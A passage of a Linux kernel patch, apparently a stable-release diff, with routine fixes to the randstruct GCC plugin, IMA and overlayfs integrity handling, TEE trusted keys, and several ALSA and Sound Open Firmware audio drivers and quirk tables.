++		for (index = size_group[x].length - 1; index > 0; index--) {
+ 			tree tmp;
++
++			i = size_group[x].start + index;
+ 			if (DECL_BIT_FIELD_TYPE(newtree[i]))
+ 				continue;
+-			randnum = ranval(prng_state) % (i + 1);
++			randnum = ranval(prng_state) % (index + 1);
++			randnum += size_group[x].start;
+ 			// we could handle this case differently if desired
+ 			if (DECL_BIT_FIELD_TYPE(newtree[randnum]))
+ 				continue;
+diff --git a/security/integrity/iint.c b/security/integrity/iint.c
+index 65418e0906c13..cb251ab0e7076 100644
+--- a/security/integrity/iint.c
++++ b/security/integrity/iint.c
+@@ -66,9 +66,32 @@ struct integrity_iint_cache *integrity_iint_find(struct inode *inode)
+ 	return iint;
+ }
+ 
+-static void iint_free(struct integrity_iint_cache *iint)
++#define IMA_MAX_NESTING (FILESYSTEM_MAX_STACK_DEPTH+1)
++
++/*
++ * It is not clear that IMA should be nested at all, but as long is it measures
++ * files both on overlayfs and on underlying fs, we need to annotate the iint
++ * mutex to avoid lockdep false positives related to IMA + overlayfs.
++ * See ovl_lockdep_annotate_inode_mutex_key() for more details.
++ */
++static inline void iint_lockdep_annotate(struct integrity_iint_cache *iint,
++					 struct inode *inode)
++{
++#ifdef CONFIG_LOCKDEP
++	static struct lock_class_key iint_mutex_key[IMA_MAX_NESTING];
++
++	int depth = inode->i_sb->s_stack_depth;
++
++	if (WARN_ON_ONCE(depth < 0 || depth >= IMA_MAX_NESTING))
++		depth = 0;
++
++	lockdep_set_class(&iint->mutex, &iint_mutex_key[depth]);
++#endif
++}
++
++static void iint_init_always(struct integrity_iint_cache *iint,
++			     struct inode *inode)
+ {
+-	kfree(iint->ima_hash);
+ 	iint->ima_hash = NULL;
+ 	iint->version = 0;
+ 	iint->flags = 0UL;
+@@ -80,6 +103,14 @@ static void iint_free(struct integrity_iint_cache *iint)
+ 	iint->ima_creds_status = INTEGRITY_UNKNOWN;
+ 	iint->evm_status = INTEGRITY_UNKNOWN;
+ 	iint->measured_pcrs = 0;
++	mutex_init(&iint->mutex);
++	iint_lockdep_annotate(iint, inode);
++}
++
++static void iint_free(struct integrity_iint_cache *iint)
++{
++	kfree(iint->ima_hash);
++	mutex_destroy(&iint->mutex);
+ 	kmem_cache_free(iint_cache, iint);
+ }
+ 
+@@ -112,6 +143,8 @@ struct integrity_iint_cache *integrity_inode_get(struct inode *inode)
+ 	if (!iint)
+ 		return NULL;
+ 
++	iint_init_always(iint, inode);
++
+ 	write_lock(&integrity_iint_lock);
+ 
+ 	p = &integrity_iint_tree.rb_node;
+@@ -161,25 +194,18 @@ void integrity_inode_free(struct inode *inode)
+ 	iint_free(iint);
+ }
+ 
+-static void init_once(void *foo)
++static void iint_init_once(void *foo)
+ {
+ 	struct integrity_iint_cache *iint = (struct integrity_iint_cache *) foo;
+ 
+ 	memset(iint, 0, sizeof(*iint));
+-	iint->ima_file_status = INTEGRITY_UNKNOWN;
+-	iint->ima_mmap_status = INTEGRITY_UNKNOWN;
+-	iint->ima_bprm_status = INTEGRITY_UNKNOWN;
+-	iint->ima_read_status = INTEGRITY_UNKNOWN;
+-	iint->ima_creds_status = INTEGRITY_UNKNOWN;
+-	iint->evm_status = INTEGRITY_UNKNOWN;
+-	mutex_init(&iint->mutex);
+ }
+ 
+ static int __init integrity_iintcache_init(void)
+ {
+ 	iint_cache =
+ 	    kmem_cache_create("iint_cache", sizeof(struct integrity_iint_cache),
+-			      0, SLAB_PANIC, init_once);
++			      0, SLAB_PANIC, iint_init_once);
+ 	return 0;
+ }
+ DEFINE_LSM(integrity) = {
+diff --git a/security/integrity/ima/ima_api.c b/security/integrity/ima/ima_api.c
+index 1e3a7a4f8833f..026c8c9db9920 100644
+--- a/security/integrity/ima/ima_api.c
++++ b/security/integrity/ima/ima_api.c
+@@ -243,6 +243,7 @@ int ima_collect_measurement(struct integrity_iint_cache *iint,
+ {
+ 	const char *audit_cause = "failed";
+ 	struct inode *inode = file_inode(file);
++	struct inode *real_inode = d_real_inode(file_dentry(file));
+ 	const char *filename = file->f_path.dentry->d_name.name;
+ 	struct ima_max_digest_data hash;
+ 	int result = 0;
+@@ -305,6 +306,10 @@ int ima_collect_measurement(struct integrity_iint_cache *iint,
+ 	iint->ima_hash = tmpbuf;
+ 	memcpy(iint->ima_hash, &hash, length);
+ 	iint->version = i_version;
++	if (real_inode != inode) {
++		iint->real_ino = real_inode->i_ino;
++		iint->real_dev = real_inode->i_sb->s_dev;
++	}
+ 
+ 	/* Possibly temporary failure due to type of read (eg. O_DIRECT) */
+ 	if (!result)
+diff --git a/security/integrity/ima/ima_main.c b/security/integrity/ima/ima_main.c
+index bc84a0ac25aaa..185666d90eebc 100644
+--- a/security/integrity/ima/ima_main.c
++++ b/security/integrity/ima/ima_main.c
+@@ -26,6 +26,7 @@
+ #include <linux/ima.h>
+ #include <linux/iversion.h>
+ #include <linux/fs.h>
++#include <linux/iversion.h>
+ 
+ #include "ima.h"
+ 
+@@ -202,7 +203,7 @@ static int process_measurement(struct file *file, const struct cred *cred,
+ 			       u32 secid, char *buf, loff_t size, int mask,
+ 			       enum ima_hooks func)
+ {
+-	struct inode *inode = file_inode(file);
++	struct inode *backing_inode, *inode = file_inode(file);
+ 	struct integrity_iint_cache *iint = NULL;
+ 	struct ima_template_desc *template_desc = NULL;
+ 	char *pathbuf = NULL;
+@@ -278,6 +279,19 @@ static int process_measurement(struct file *file, const struct cred *cred,
+ 		iint->measured_pcrs = 0;
+ 	}
+ 
++	/* Detect and re-evaluate changes made to the backing file. */
++	backing_inode = d_real_inode(file_dentry(file));
++	if (backing_inode != inode &&
++	    (action & IMA_DO_MASK) && (iint->flags & IMA_DONE_MASK)) {
++		if (!IS_I_VERSION(backing_inode) ||
++		    backing_inode->i_sb->s_dev != iint->real_dev ||
++		    backing_inode->i_ino != iint->real_ino ||
++		    !inode_eq_iversion(backing_inode, iint->version)) {
++			iint->flags &= ~IMA_DONE_MASK;
++			iint->measured_pcrs = 0;
++		}
++	}
++
+ 	/* Determine if already appraised/measured based on bitmask
+ 	 * (IMA_MEASURE, IMA_MEASURED, IMA_XXXX_APPRAISE, IMA_XXXX_APPRAISED,
+ 	 *  IMA_AUDIT, IMA_AUDITED)
+diff --git a/security/integrity/integrity.h b/security/integrity/integrity.h
+index 7167a6e99bdc0..52c3c806bf69f 100644
+--- a/security/integrity/integrity.h
++++ b/security/integrity/integrity.h
+@@ -164,6 +164,8 @@ struct integrity_iint_cache {
+ 	unsigned long flags;
+ 	unsigned long measured_pcrs;
+ 	unsigned long atomic_flags;
++	unsigned long real_ino;
++	dev_t real_dev;
+ 	enum integrity_status ima_file_status:4;
+ 	enum integrity_status ima_mmap_status:4;
+ 	enum integrity_status ima_bprm_status:4;
+diff --git a/security/keys/trusted-keys/trusted_core.c b/security/keys/trusted-keys/trusted_core.c
+index 85fb5c22529a7..fee1ab2c734d3 100644
+--- a/security/keys/trusted-keys/trusted_core.c
++++ b/security/keys/trusted-keys/trusted_core.c
+@@ -358,17 +358,17 @@ static int __init init_trusted(void)
+ 		if (!get_random)
+ 			get_random = kernel_get_random;
+ 
+-		static_call_update(trusted_key_seal,
+-				   trusted_key_sources[i].ops->seal);
+-		static_call_update(trusted_key_unseal,
+-				   trusted_key_sources[i].ops->unseal);
+-		static_call_update(trusted_key_get_random,
+-				   get_random);
+-		trusted_key_exit = trusted_key_sources[i].ops->exit;
+-		migratable = trusted_key_sources[i].ops->migratable;
+-
+ 		ret = trusted_key_sources[i].ops->init();
+-		if (!ret)
++		if (!ret) {
++			static_call_update(trusted_key_seal, trusted_key_sources[i].ops->seal);
++			static_call_update(trusted_key_unseal, trusted_key_sources[i].ops->unseal);
++			static_call_update(trusted_key_get_random, get_random);
++
++			trusted_key_exit = trusted_key_sources[i].ops->exit;
++			migratable = trusted_key_sources[i].ops->migratable;
++		}
++
++		if (!ret || ret != -ENODEV)
+ 			break;
+ 	}
+ 
+diff --git a/security/keys/trusted-keys/trusted_tee.c b/security/keys/trusted-keys/trusted_tee.c
+index c8626686ee1b7..24f67ca8d7131 100644
+--- a/security/keys/trusted-keys/trusted_tee.c
++++ b/security/keys/trusted-keys/trusted_tee.c
+@@ -65,24 +65,16 @@ static int trusted_tee_seal(struct trusted_key_payload *p, char *datablob)
+ 	int ret;
+ 	struct tee_ioctl_invoke_arg inv_arg;
+ 	struct tee_param param[4];
+-	struct tee_shm *reg_shm_in = NULL, *reg_shm_out = NULL;
++	struct tee_shm *reg_shm = NULL;
+ 
+ 	memset(&inv_arg, 0, sizeof(inv_arg));
+ 	memset(&param, 0, sizeof(param));
+ 
+-	reg_shm_in = tee_shm_register_kernel_buf(pvt_data.ctx, p->key,
+-						 p->key_len);
+-	if (IS_ERR(reg_shm_in)) {
+-		dev_err(pvt_data.dev, "key shm register failed\n");
+-		return PTR_ERR(reg_shm_in);
+-	}
+-
+-	reg_shm_out = tee_shm_register_kernel_buf(pvt_data.ctx, p->blob,
+-						  sizeof(p->blob));
+-	if (IS_ERR(reg_shm_out)) {
+-		dev_err(pvt_data.dev, "blob shm register failed\n");
+-		ret = PTR_ERR(reg_shm_out);
+-		goto out;
++	reg_shm = tee_shm_register_kernel_buf(pvt_data.ctx, p->key,
++					      sizeof(p->key) + sizeof(p->blob));
++	if (IS_ERR(reg_shm)) {
++		dev_err(pvt_data.dev, "shm register failed\n");
++		return PTR_ERR(reg_shm);
+ 	}
+ 
+ 	inv_arg.func = TA_CMD_SEAL;
+@@ -90,13 +82,13 @@ static int trusted_tee_seal(struct trusted_key_payload *p, char *datablob)
+ 	inv_arg.num_params = 4;
+ 
+ 	param[0].attr = TEE_IOCTL_PARAM_ATTR_TYPE_MEMREF_INPUT;
+-	param[0].u.memref.shm = reg_shm_in;
++	param[0].u.memref.shm = reg_shm;
+ 	param[0].u.memref.size = p->key_len;
+ 	param[0].u.memref.shm_offs = 0;
+ 	param[1].attr = TEE_IOCTL_PARAM_ATTR_TYPE_MEMREF_OUTPUT;
+-	param[1].u.memref.shm = reg_shm_out;
++	param[1].u.memref.shm = reg_shm;
+ 	param[1].u.memref.size = sizeof(p->blob);
+-	param[1].u.memref.shm_offs = 0;
++	param[1].u.memref.shm_offs = sizeof(p->key);
+ 
+ 	ret = tee_client_invoke_func(pvt_data.ctx, &inv_arg, param);
+ 	if ((ret < 0) || (inv_arg.ret != 0)) {
+@@ -107,11 +99,7 @@ static int trusted_tee_seal(struct trusted_key_payload *p, char *datablob)
+ 		p->blob_len = param[1].u.memref.size;
+ 	}
+ 
+-out:
+-	if (reg_shm_out)
+-		tee_shm_free(reg_shm_out);
+-	if (reg_shm_in)
+-		tee_shm_free(reg_shm_in);
++	tee_shm_free(reg_shm);
+ 
+ 	return ret;
+ }
+@@ -124,24 +112,16 @@ static int trusted_tee_unseal(struct trusted_key_payload *p, char *datablob)
+ 	int ret;
+ 	struct tee_ioctl_invoke_arg inv_arg;
+ 	struct tee_param param[4];
+-	struct tee_shm *reg_shm_in = NULL, *reg_shm_out = NULL;
++	struct tee_shm *reg_shm = NULL;
+ 
+ 	memset(&inv_arg, 0, sizeof(inv_arg));
+ 	memset(&param, 0, sizeof(param));
+ 
+-	reg_shm_in = tee_shm_register_kernel_buf(pvt_data.ctx, p->blob,
+-						 p->blob_len);
+-	if (IS_ERR(reg_shm_in)) {
+-		dev_err(pvt_data.dev, "blob shm register failed\n");
+-		return PTR_ERR(reg_shm_in);
+-	}
+-
+-	reg_shm_out = tee_shm_register_kernel_buf(pvt_data.ctx, p->key,
+-						  sizeof(p->key));
+-	if (IS_ERR(reg_shm_out)) {
+-		dev_err(pvt_data.dev, "key shm register failed\n");
+-		ret = PTR_ERR(reg_shm_out);
+-		goto out;
++	reg_shm = tee_shm_register_kernel_buf(pvt_data.ctx, p->key,
++					      sizeof(p->key) + sizeof(p->blob));
++	if (IS_ERR(reg_shm)) {
++		dev_err(pvt_data.dev, "shm register failed\n");
++		return PTR_ERR(reg_shm);
+ 	}
+ 
+ 	inv_arg.func = TA_CMD_UNSEAL;
+@@ -149,11 +129,11 @@ static int trusted_tee_unseal(struct trusted_key_payload *p, char *datablob)
+ 	inv_arg.num_params = 4;
+ 
+ 	param[0].attr = TEE_IOCTL_PARAM_ATTR_TYPE_MEMREF_INPUT;
+-	param[0].u.memref.shm = reg_shm_in;
++	param[0].u.memref.shm = reg_shm;
+ 	param[0].u.memref.size = p->blob_len;
+-	param[0].u.memref.shm_offs = 0;
++	param[0].u.memref.shm_offs = sizeof(p->key);
+ 	param[1].attr = TEE_IOCTL_PARAM_ATTR_TYPE_MEMREF_OUTPUT;
+-	param[1].u.memref.shm = reg_shm_out;
++	param[1].u.memref.shm = reg_shm;
+ 	param[1].u.memref.size = sizeof(p->key);
+ 	param[1].u.memref.shm_offs = 0;
+ 
+@@ -166,11 +146,7 @@ static int trusted_tee_unseal(struct trusted_key_payload *p, char *datablob)
+ 		p->key_len = param[1].u.memref.size;
+ 	}
+ 
+-out:
+-	if (reg_shm_out)
+-		tee_shm_free(reg_shm_out);
+-	if (reg_shm_in)
+-		tee_shm_free(reg_shm_in);
++	tee_shm_free(reg_shm);
+ 
+ 	return ret;
+ }
+diff --git a/sound/core/info.c b/sound/core/info.c
+index 0b2f04dcb5897..e2f302e55bbb2 100644
+--- a/sound/core/info.c
++++ b/sound/core/info.c
+@@ -56,7 +56,7 @@ struct snd_info_private_data {
+ };
+ 
+ static int snd_info_version_init(void);
+-static void snd_info_disconnect(struct snd_info_entry *entry);
++static void snd_info_clear_entries(struct snd_info_entry *entry);
+ 
+ /*
+ 
+@@ -569,11 +569,16 @@ void snd_info_card_disconnect(struct snd_card *card)
+ {
+ 	if (!card)
+ 		return;
+-	mutex_lock(&info_mutex);
++
+ 	proc_remove(card->proc_root_link);
+-	card->proc_root_link = NULL;
+ 	if (card->proc_root)
+-		snd_info_disconnect(card->proc_root);
++		proc_remove(card->proc_root->p);
++
++	mutex_lock(&info_mutex);
++	if (card->proc_root)
++		snd_info_clear_entries(card->proc_root);
++	card->proc_root_link = NULL;
++	card->proc_root = NULL;
+ 	mutex_unlock(&info_mutex);
+ }
+ 
+@@ -745,15 +750,14 @@ struct snd_info_entry *snd_info_create_card_entry(struct snd_card *card,
+ }
+ EXPORT_SYMBOL(snd_info_create_card_entry);
+ 
+-static void snd_info_disconnect(struct snd_info_entry *entry)
++static void snd_info_clear_entries(struct snd_info_entry *entry)
+ {
+ 	struct snd_info_entry *p;
+ 
+ 	if (!entry->p)
+ 		return;
+ 	list_for_each_entry(p, &entry->children, list)
+-		snd_info_disconnect(p);
+-	proc_remove(entry->p);
++		snd_info_clear_entries(p);
+ 	entry->p = NULL;
+ }
+ 
+@@ -770,8 +774,9 @@ void snd_info_free_entry(struct snd_info_entry * entry)
+ 	if (!entry)
+ 		return;
+ 	if (entry->p) {
++		proc_remove(entry->p);
+ 		mutex_lock(&info_mutex);
+-		snd_info_disconnect(entry);
++		snd_info_clear_entries(entry);
+ 		mutex_unlock(&info_mutex);
+ 	}
+ 
+diff --git a/sound/hda/hdac_stream.c b/sound/hda/hdac_stream.c
+index 1b8be39c38a96..741a5d17ae4cb 100644
+--- a/sound/hda/hdac_stream.c
++++ b/sound/hda/hdac_stream.c
+@@ -338,8 +338,10 @@ struct hdac_stream *snd_hdac_stream_assign(struct hdac_bus *bus,
+ 	struct hdac_stream *res = NULL;
+ 
+ 	/* make a non-zero unique key for the substream */
+-	int key = (substream->pcm->device << 16) | (substream->number << 2) |
+-		(substream->stream + 1);
++	int key = (substream->number << 2) | (substream->stream + 1);
++
++	if (substream->pcm)
++		key |= (substream->pcm->device << 16);
+ 
+ 	spin_lock_irq(&bus->reg_lock);
+ 	list_for_each_entry(azx_dev, &bus->stream_list, list) {
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 0163d4c7fdda8..b63e12b661996 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9624,6 +9624,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8898, "HP EliteBook 845 G8 Notebook PC", ALC285_FIXUP_HP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x103c, 0x88d0, "HP Pavilion 15-eh1xxx (mainboard 88D0)", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8902, "HP OMEN 16", ALC285_FIXUP_HP_MUTE_LED),
++	SND_PCI_QUIRK(0x103c, 0x890e, "HP 255 G8 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8919, "HP Pavilion Aero Laptop 13-be0xxx", ALC287_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x896d, "HP ZBook Firefly 16 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x896e, "HP EliteBook x360 830 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+@@ -9659,6 +9660,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8abb, "HP ZBook Firefly 14 G9", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad1, "HP EliteBook 840 14 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8ad2, "HP EliteBook 860 16 inch G9 Notebook PC", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8b2f, "HP 255 15.6 inch G10 Notebook PC", ALC236_FIXUP_HP_MUTE_LED_COEFBIT2),
+ 	SND_PCI_QUIRK(0x103c, 0x8b42, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b43, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8b44, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
+@@ -9692,12 +9694,16 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c70, "HP EliteBook 835 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8ca4, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8ca7, "HP ZBook Fury", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8cf5, "HP ZBook Studio 16", ALC245_FIXUP_CS35L41_SPI_4_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x1043, 0x103e, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x103f, "ASUS TX300", ALC282_FIXUP_ASUS_TX300),
+ 	SND_PCI_QUIRK(0x1043, 0x106d, "Asus K53BE", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x1043, 0x10a1, "ASUS UX391UA", ALC294_FIXUP_ASUS_SPK),
+ 	SND_PCI_QUIRK(0x1043, 0x10c0, "ASUS X540SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x10d0, "ASUS X540LA/X540LJ", ALC255_FIXUP_ASUS_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1043, 0x10d3, "ASUS K6500ZC", ALC294_FIXUP_ASUS_SPK),
+ 	SND_PCI_QUIRK(0x1043, 0x115d, "Asus 1015E", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x1043, 0x11c0, "ASUS X556UR", ALC255_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x125e, "ASUS Q524UQK", ALC255_FIXUP_ASUS_MIC_NO_PRESENCE),
+@@ -9749,6 +9755,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1d4e, "ASUS TM420", ALC256_FIXUP_ASUS_HPE),
+ 	SND_PCI_QUIRK(0x1043, 0x1e02, "ASUS UX3402ZA", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x16a3, "ASUS UX3402VA", ALC245_FIXUP_CS35L41_SPI_2),
++	SND_PCI_QUIRK(0x1043, 0x1f62, "ASUS UX7602ZM", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e11, "ASUS Zephyrus G15", ALC289_FIXUP_ASUS_GA502),
+ 	SND_PCI_QUIRK(0x1043, 0x1e12, "ASUS UM3402", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x1043, 0x1e51, "ASUS Zephyrus M15", ALC294_FIXUP_ASUS_GU502_PINS),
+@@ -10590,22 +10597,6 @@ static const struct snd_hda_pin_quirk alc269_pin_fixup_tbl[] = {
+ 		{0x12, 0x90a60130},
+ 		{0x17, 0x90170110},
+ 		{0x21, 0x03211020}),
+-	SND_HDA_PIN_QUIRK(0x10ec0295, 0x1028, "Dell", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE,
+-		{0x14, 0x90170110},
+-		{0x21, 0x04211020}),
+-	SND_HDA_PIN_QUIRK(0x10ec0295, 0x1028, "Dell", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE,
+-		{0x14, 0x90170110},
+-		{0x21, 0x04211030}),
+-	SND_HDA_PIN_QUIRK(0x10ec0295, 0x1028, "Dell", ALC269_FIXUP_DELL1_MIC_NO_PRESENCE,
+-		ALC295_STANDARD_PINS,
+-		{0x17, 0x21014020},
+-		{0x18, 0x21a19030}),
+-	SND_HDA_PIN_QUIRK(0x10ec0295, 0x1028, "Dell", ALC269_FIXUP_DELL1_MIC_NO_PRESENCE,
+-		ALC295_STANDARD_PINS,
+-		{0x17, 0x21014040},
+-		{0x18, 0x21a19050}),
+-	SND_HDA_PIN_QUIRK(0x10ec0295, 0x1028, "Dell", ALC269_FIXUP_DELL1_MIC_NO_PRESENCE,
+-		ALC295_STANDARD_PINS),
+ 	SND_HDA_PIN_QUIRK(0x10ec0298, 0x1028, "Dell", ALC298_FIXUP_DELL1_MIC_NO_PRESENCE,
+ 		ALC298_STANDARD_PINS,
+ 		{0x17, 0x90170110}),
+@@ -10649,6 +10640,9 @@ static const struct snd_hda_pin_quirk alc269_fallback_pin_fixup_tbl[] = {
+ 	SND_HDA_PIN_QUIRK(0x10ec0289, 0x1028, "Dell", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE,
+ 		{0x19, 0x40000000},
+ 		{0x1b, 0x40000000}),
++	SND_HDA_PIN_QUIRK(0x10ec0295, 0x1028, "Dell", ALC269_FIXUP_DELL4_MIC_NO_PRESENCE,
++		{0x19, 0x40000000},
++		{0x1b, 0x40000000}),
+ 	SND_HDA_PIN_QUIRK(0x10ec0256, 0x1028, "Dell", ALC255_FIXUP_DELL1_MIC_NO_PRESENCE,
+ 		{0x19, 0x40000000},
+ 		{0x1a, 0x40000000}),
+diff --git a/sound/soc/codecs/lpass-wsa-macro.c b/sound/soc/codecs/lpass-wsa-macro.c
+index 8ed48c86ccb33..2ccc68513f7c1 100644
+--- a/sound/soc/codecs/lpass-wsa-macro.c
++++ b/sound/soc/codecs/lpass-wsa-macro.c
+@@ -1682,6 +1682,9 @@ static int wsa_macro_spk_boost_event(struct snd_soc_dapm_widget *w,
+ 		boost_path_cfg1 = CDC_WSA_RX1_RX_PATH_CFG1;
+ 		reg = CDC_WSA_RX1_RX_PATH_CTL;
+ 		reg_mix = CDC_WSA_RX1_RX_PATH_MIX_CTL;
++	} else {
++		dev_warn(component->dev, "Incorrect widget name in the driver\n");
++		return -EINVAL;
+ 	}
+ 
+ 	switch (event) {
+diff --git a/sound/soc/intel/common/soc-acpi-intel-cht-match.c b/sound/soc/intel/common/soc-acpi-intel-cht-match.c
+index cdcbf04b8832f..5e2ec60e2954b 100644
+--- a/sound/soc/intel/common/soc-acpi-intel-cht-match.c
++++ b/sound/soc/intel/common/soc-acpi-intel-cht-match.c
+@@ -75,6 +75,39 @@ static struct snd_soc_acpi_mach *cht_ess8316_quirk(void *arg)
+ 	return arg;
+ }
+ 
++/*
++ * The Lenovo Yoga Tab 3 Pro YT3-X90, with Android factory OS has a buggy DSDT
++ * with the coded not being listed at all.
++ */
++static const struct dmi_system_id lenovo_yoga_tab3_x90[] = {
++	{
++		/* Lenovo Yoga Tab 3 Pro YT3-X90, codec missing from DSDT */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++			DMI_MATCH(DMI_PRODUCT_VERSION, "Blade3-10A-001"),
++		},
++	},
++	{ }
++};
++
++static struct snd_soc_acpi_mach cht_lenovo_yoga_tab3_x90_mach = {
++	.id = "10WM5102",
++	.drv_name = "bytcr_wm5102",
++	.fw_filename = "intel/fw_sst_22a8.bin",
++	.board = "bytcr_wm5102",
++	.sof_tplg_filename = "sof-cht-wm5102.tplg",
++};
++
++static struct snd_soc_acpi_mach *lenovo_yt3_x90_quirk(void *arg)
++{
++	if (dmi_check_system(lenovo_yoga_tab3_x90))
++		return &cht_lenovo_yoga_tab3_x90_mach;
++
++	/* Skip wildcard match snd_soc_acpi_intel_cherrytrail_machines[] entry */
++	return NULL;
++}
++
+ static const struct snd_soc_acpi_codecs rt5640_comp_ids = {
+ 	.num_codecs = 2,
+ 	.codecs = { "10EC5640", "10EC3276" },
+@@ -175,6 +208,16 @@ struct snd_soc_acpi_mach  snd_soc_acpi_intel_cherrytrail_machines[] = {
+ 		.drv_name = "sof_pcm512x",
+ 		.sof_tplg_filename = "sof-cht-src-50khz-pcm512x.tplg",
+ 	},
++	/*
++	 * Special case for the Lenovo Yoga Tab 3 Pro YT3-X90 where the DSDT
++	 * misses the codec. Match on the SST id instead, lenovo_yt3_x90_quirk()
++	 * will return a YT3 specific mach or NULL when called on other hw,
++	 * skipping this entry.
++	 */
++	{
++		.id = "808622A8",
++		.machine_quirk = lenovo_yt3_x90_quirk,
++	},
+ 
+ #if IS_ENABLED(CONFIG_SND_SOC_INTEL_BYT_CHT_NOCODEC_MACH)
+ 	/*
+diff --git a/sound/soc/sof/ipc4.c b/sound/soc/sof/ipc4.c
+index c08f3960ddd96..06e1872abfee7 100644
+--- a/sound/soc/sof/ipc4.c
++++ b/sound/soc/sof/ipc4.c
+@@ -601,6 +601,9 @@ static void sof_ipc4_rx_msg(struct snd_sof_dev *sdev)
+ 	case SOF_IPC4_NOTIFY_LOG_BUFFER_STATUS:
+ 		sof_ipc4_mtrace_update_pos(sdev, SOF_IPC4_LOG_CORE_GET(ipc4_msg->primary));
+ 		break;
++	case SOF_IPC4_NOTIFY_EXCEPTION_CAUGHT:
++		snd_sof_dsp_panic(sdev, 0, true);
++		break;
+ 	default:
+ 		dev_dbg(sdev->dev, "Unhandled DSP message: %#x|%#x\n",
+ 			ipc4_msg->primary, ipc4_msg->extension);
+diff --git a/sound/soc/sof/sof-audio.c b/sound/soc/sof/sof-audio.c
+index cf2c0db57d899..061ab7289a6c3 100644
+--- a/sound/soc/sof/sof-audio.c
++++ b/sound/soc/sof/sof-audio.c
+@@ -832,6 +832,13 @@ int sof_machine_check(struct snd_sof_dev *sdev)
+ 		mach = snd_sof_machine_select(sdev);
+ 		if (mach) {
+ 			sof_pdata->machine = mach;
++
++			if (sof_pdata->subsystem_id_set) {
++				mach->mach_params.subsystem_vendor = sof_pdata->subsystem_vendor;
++				mach->mach_params.subsystem_device = sof_pdata->subsystem_device;
++				mach->mach_params.subsystem_id_set = true;
++			}
++
+ 			snd_sof_set_mach_params(mach, sdev);
+ 			return 0;
+ 		}
+diff --git a/sound/soc/sof/sof-pci-dev.c b/sound/soc/sof/sof-pci-dev.c
+index 05fb4e20e8a40..99cc272e321d0 100644
+--- a/sound/soc/sof/sof-pci-dev.c
++++ b/sound/soc/sof/sof-pci-dev.c
+@@ -217,6 +217,14 @@ int sof_pci_probe(struct pci_dev *pci, const struct pci_device_id *pci_id)
+ 		return ret;
+ 
+ 	sof_pdata->name = pci_name(pci);
++
++	/* PCI defines a vendor ID of 0xFFFF as invalid. */
++	if (pci->subsystem_vendor != 0xFFFF) {
++		sof_pdata->subsystem_vendor = pci->subsystem_vendor;
++		sof_pdata->subsystem_device = pci->subsystem_device;
++		sof_pdata->subsystem_id_set = true;
++	}
++
+ 	sof_pdata->desc = desc;
+ 	sof_pdata->dev = dev;
+ 
+diff --git a/sound/soc/ti/omap-mcbsp.c b/sound/soc/ti/omap-mcbsp.c
+index 7c539a41a6a34..4b8aac1a36fa2 100644
+--- a/sound/soc/ti/omap-mcbsp.c
++++ b/sound/soc/ti/omap-mcbsp.c
+@@ -74,14 +74,16 @@ static int omap2_mcbsp_set_clks_src(struct omap_mcbsp *mcbsp, u8 fck_src_id)
+ 		return -EINVAL;
+ 	}
